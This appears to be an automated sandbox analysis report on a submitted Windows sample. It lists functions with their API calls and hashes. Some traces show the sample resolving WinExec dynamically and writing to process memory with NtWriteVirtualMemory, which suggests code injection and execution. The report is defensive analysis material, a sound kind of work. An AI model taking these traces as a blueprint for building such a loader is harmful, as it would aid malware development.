                                        • Opcode Fuzzy Hash: eac469f51af5eb1fb6cf3f56115eb1897e807f397025970f8ecd5bff98624696
                                        • Instruction Fuzzy Hash: C8410E71B501089FEB12EBA4DC81A9EB3FAFF8C320F6148A5E141A7250DE74ED059F60
                                        Function 02B4840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • WinExec.KERNEL32(?,?), ref: 02B48478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$Exec
                                        • String ID: Kernel32$WinExec
                                        • API String ID: 2292790416-3609268280
                                        • Opcode ID: 4dffc9f80140bdeb2d71b54b1feeaddd79cd6e488d9d16091eb3f23cb7789310
                                        • Instruction ID: 353d0769635558fba0cbf3808e67a766105e7e4a2a7413dfdcdbc64af108d1bb
                                        • Opcode Fuzzy Hash: 4dffc9f80140bdeb2d71b54b1feeaddd79cd6e488d9d16091eb3f23cb7789310
                                        • Instruction Fuzzy Hash: 4C018C35A54204BFEB11EFB8DC82B5A77FDE748750F9184A1F504E7A50DA74AD00AA24
                                        Function 02B48410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                        • WinExec.KERNEL32(?,?), ref: 02B48478
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressProc$Exec
                                        • String ID: Kernel32$WinExec
                                        • API String ID: 2292790416-3609268280
                                        • Opcode ID: 2a841243de9c19cf54a01c7fbf363dc054f1fd9dbb99fc61ba20e42a5d26acc3
                                        • Instruction ID: 3c09a39f9ac6cf051482cdfea22cbc83af0d669d8e31071062271029039cb7e8
                                        • Opcode Fuzzy Hash: 2a841243de9c19cf54a01c7fbf363dc054f1fd9dbb99fc61ba20e42a5d26acc3
                                        • Instruction Fuzzy Hash: 6BF08C35A54204BFEB11EFB8DC82B5A77BDE748750F9184A1F504E7A50DA74A900AA24
                                        Function 02B45BB4 Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45C10
                                        • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45C3E
                                          • Part of subcall function 02B37D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B43888,02B45C7E,00000000,02B45CFC,?,?,02B43888), ref: 02B37D66
                                          • Part of subcall function 02B37F20: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B43888,02B45C99,00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B37F3F
                                        • GetLastError.KERNEL32(00000000,02B45CFC,?,?,02B43888,00000001), ref: 02B45CA3
                                          • Part of subcall function 02B3A700: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B3C361,00000000,02B3C3BB), ref: 02B3A71F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                        • String ID:
                                        • API String ID: 503785936-0
                                        • Opcode ID: e39027f5c567a172c52bd4e3c962e275022b61c5c489c2d4a0b62e0ab61aa927
                                        • Instruction ID: 421a72dc749f1c95695a10ae64b5cfc250b75cd48ce5d89ec7b19a624a2ac9d7
                                        • Opcode Fuzzy Hash: e39027f5c567a172c52bd4e3c962e275022b61c5c489c2d4a0b62e0ab61aa927
                                        • Instruction Fuzzy Hash: 41318375E006089FEB11EFA4C881B9EBBF6AF48314F9084A5E904E7381DB755A05CFA1
                                        Function 02B4E6BE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,00000000,02C85914), ref: 02B4E704
                                        • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E73C
                                        • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E747
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenValue
                                        • String ID:
                                        • API String ID: 779948276-0
                                        • Opcode ID: 19cefc35a481de766d218b767752af6788f70c5ed6a9e38eab38bbc5beb6ceb6
                                        • Instruction ID: 9dc92484e8dc511e5141089114217838f28bdd79d9d746bc43169b75eada46aa
                                        • Opcode Fuzzy Hash: 19cefc35a481de766d218b767752af6788f70c5ed6a9e38eab38bbc5beb6ceb6
                                        • Instruction Fuzzy Hash: 6F113D71A50208BFEB01EFA8CC81E6A77BDEB49360F8145B0B604D7250DB74DE01DA64
                                        Function 02B4E6C0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RegOpenKeyA.ADVAPI32(?,00000000,02C85914), ref: 02B4E704
                                        • RegSetValueExA.ADVAPI32(00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E73C
                                        • RegCloseKey.ADVAPI32(00000874,00000874,00000000,00000000,00000001,00000000,0000001C,00000000,02B4E76F), ref: 02B4E747
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: CloseOpenValue
                                        • String ID:
                                        • API String ID: 779948276-0
                                        • Opcode ID: f8f5bc27a2b9e69145dd937822a29463f7dc895c4947c7de0916cb8398fc6169
                                        • Instruction ID: 26c427af1f59c9e9ef7075e14b6793475c694c2723bffe30da7b834f75dd42f5
                                        • Opcode Fuzzy Hash: f8f5bc27a2b9e69145dd937822a29463f7dc895c4947c7de0916cb8398fc6169
                                        • Instruction Fuzzy Hash: F5114F71A50208BFEB01EFA8CC81E6E77BDEB49360F8145B0B604D7250DB74DA01DA64
                                        Function 02B3E2EC Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: ClearVariant
                                        • String ID:
                                        • API String ID: 1473721057-0
                                        • Opcode ID: 473e644049c4bf136f57307527130cd8bdc8c414c7d4bf3fec19d98c2f01a562
                                        • Instruction ID: dd2b32e3b91deacf75c56de52557b833b0a839cfc73c56e5d7d217fc1f62e84a
                                        • Opcode Fuzzy Hash: 473e644049c4bf136f57307527130cd8bdc8c414c7d4bf3fec19d98c2f01a562
                                        • Instruction Fuzzy Hash: 91F0962470421097D7237B79D9C466D379AAF85710B50D4F7F486AB245CB34EC45CB63
                                        Function 02B34CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        • SysAllocStringLen.OLEAUT32(?,?), ref: 02B34D07
                                        • SysFreeString.OLEAUT32(00000000), ref: 02B34D19
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: String$Free$Alloc
                                        • String ID:
                                        • API String ID: 986138563-0
                                        • Opcode ID: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                        • Instruction ID: 9610242c4a335eb6121041d78c79ded7c683caa518ce7c7a9ca2ded7f7d0870e
                                        • Opcode Fuzzy Hash: 91ceca5fa6b4b00783c1dc5844824a1c1d513446ded2c2740a365c4c94c32ece
                                        • Instruction Fuzzy Hash: D5E017B82152016EEF1B2F259C40B3B373EFFC2741B6488D9A844CA160EB78C841AE34
                                        Function 02B47064 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                        Download Yara Rule
                                        APIs
                                        • SysFreeString.OLEAUT32(?), ref: 02B47362
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeString
                                        • String ID: H
                                        • API String ID: 3341692771-2852464175
                                        • Opcode ID: c9ac82053f5c45dd2481ec4f59abdea3f543f4f104e3df384e3543b3af491ee9
                                        • Instruction ID: 2f6bcacb4d0b6d7c15806a0e4c9718df620473e6cbcb30991be35f8b75867b83
                                        • Opcode Fuzzy Hash: c9ac82053f5c45dd2481ec4f59abdea3f543f4f104e3df384e3543b3af491ee9
                                        • Instruction Fuzzy Hash: A2B1E274A016089FDB15CF99D8C0A9DFBF2FF4A314F2485A9E845AB360DB31A845EF50
                                        Function 02B48824 Relevance: 3.1, APIs: 2, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(00000000,00000000,02B4890B), ref: 02B48858
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B48090,?,?,00000000,?,02B47A06,ntdll,00000000,00000000,02B47A4B,?,?,00000000), ref: 02B4805E
                                          • Part of subcall function 02B48020: GetModuleHandleA.KERNELBASE(?), ref: 02B48072
                                          • Part of subcall function 02B480C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B48150,?,?,00000000,00000000,?,02B48069,00000000,KernelBASE,00000000,00000000,02B48090), ref: 02B48115
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B4811B
                                          • Part of subcall function 02B480C8: GetProcAddress.KERNEL32(?,?), ref: 02B4812D
                                          • Part of subcall function 02B47D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B47D74
                                        • FreeLibrary.KERNEL32(74FA0000,00000000,02B91388,Function_000065D8,00000004,02B91398,02B91388,05F5E0FF,00000040,02B9139C,74FA0000,00000000,00000000,00000000,00000000,02B4890B), ref: 02B488EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: HandleModule$AddressLibraryProc$FreeLoadMemoryVirtualWrite
                                        • String ID:
                                        • API String ID: 3283153180-0
                                        • Opcode ID: db515c3d4c39eb2f9378a3d8a9f493baa7ef0162c3aaca65522b113292fe6019
                                        • Instruction ID: 52fea064b65333e22c7a159866cf22cab98f56666c12b67979cd60bcd43eaeeb
                                        • Opcode Fuzzy Hash: db515c3d4c39eb2f9378a3d8a9f493baa7ef0162c3aaca65522b113292fe6019
                                        • Instruction Fuzzy Hash: C2117C71A54304BFEF02FBA8CD42A5E77BAEB45700F4149E4F208A7A51CE34AD00BB14
                                        Function 02B3E6E8 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                        Download Yara Rule
                                        APIs
                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B3E709
                                          • Part of subcall function 02B3E2EC: VariantClear.OLEAUT32(?), ref: 02B3E2FB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Variant$ClearCopy
                                        • String ID:
                                        • API String ID: 274517740-0
                                        • Opcode ID: 137cedc2276fc5716be7b4582d6c113224e07109cb2c8c184ed65202ac8c6dcb
                                        • Instruction ID: 54618e35d5ab1df57ceeb765b5ab4283dba0878b7bf4c225ce5624549de204e2
                                        • Opcode Fuzzy Hash: 137cedc2276fc5716be7b4582d6c113224e07109cb2c8c184ed65202ac8c6dcb
                                        • Instruction Fuzzy Hash: 3E11E135710210C7CB23AF28CDC066677AAEF9575070584E7FA4A8B256DB30DC01CAA2
                                        Function 02B3E384 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: InitVariant
                                        • String ID:
                                        • API String ID: 1927566239-0
                                        • Opcode ID: 5be7c9b597426923c032744daf3c0567327b35d234ad515adbf8754da933ecbb
                                        • Instruction ID: e8651121ac94b21ffebed6a47b4b159649ffa8450d67bd22e3057c53a9667292
                                        • Opcode Fuzzy Hash: 5be7c9b597426923c032744daf3c0567327b35d234ad515adbf8754da933ecbb
                                        • Instruction Fuzzy Hash: 36313E75A00209AFDB12DEA8D984AAE77E8EF0C314F4845A7F915E3250D734E951CBA2
                                        Function 02B46CF4 Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                        Download Yara Rule
                                        APIs
                                        • CLSIDFromProgID.OLE32(00000000,?,00000000,02B46D41,?,?,?,00000000), ref: 02B46D21
                                          • Part of subcall function 02B34C0C: SysFreeString.OLEAUT32(02B4E950), ref: 02B34C1A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FreeFromProgString
                                        • String ID:
                                        • API String ID: 4225568880-0
                                        • Opcode ID: acd18929c02bcc67e01565afaa10436945fc68e659877ca6bebaf5aabea23b51
                                        • Instruction ID: 85ee39cd73decf3aa370943cf29e6307b3ff9d1900d6f92464dbf8046230465d
                                        • Opcode Fuzzy Hash: acd18929c02bcc67e01565afaa10436945fc68e659877ca6bebaf5aabea23b51
                                        • Instruction Fuzzy Hash: 68E06D31604318BBE702EBA5DC9196A7BFDEB4AB10B9144F1F801D3610DE74AE00A860
                                        Function 02B35814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(02B30000,?,00000105), ref: 02B35832
                                          • Part of subcall function 02B35A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B30000,02B5D790), ref: 02B35A94
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AB2
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B30000,02B5D790), ref: 02B35AD0
                                          • Part of subcall function 02B35A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B35AEE
                                          • Part of subcall function 02B35A78: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B35B37
                                          • Part of subcall function 02B35A78: RegQueryValueExA.ADVAPI32(?,02B35CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B35B7D,?,80000001), ref: 02B35B55
                                          • Part of subcall function 02B35A78: RegCloseKey.ADVAPI32(?,02B35B84,00000000,?,?,00000000,02B35B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B35B77
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: Open$FileModuleNameQueryValue$Close
                                        • String ID:
                                        • API String ID: 2796650324-0
                                        • Opcode ID: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                        • Instruction ID: c6a016789a99dab2843083c29c4c896d0cb4efe7a6b3c1fea43cad0ddc0c4cf9
                                        • Opcode Fuzzy Hash: b28d12baadab1e4308946262d595483018c342fe3ea7939c094ad429c1d6dced
                                        • Instruction Fuzzy Hash: 12E06DB1A002148BCB21DE5C88C0A9637D8AB08750F4005A5EC58DF34AD3B0E9548BD0
                                        Function 02B37D9C Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B37DB0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2195355441.0000000002B31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: true
                                        • Associated: 00000000.00000002.2195326497.0000000002B30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B5D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195493513.0000000002B8E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002B91000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C85000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000000.00000002.2195675671.0000000002C88000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_2b30000_MeP66xi1AM.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
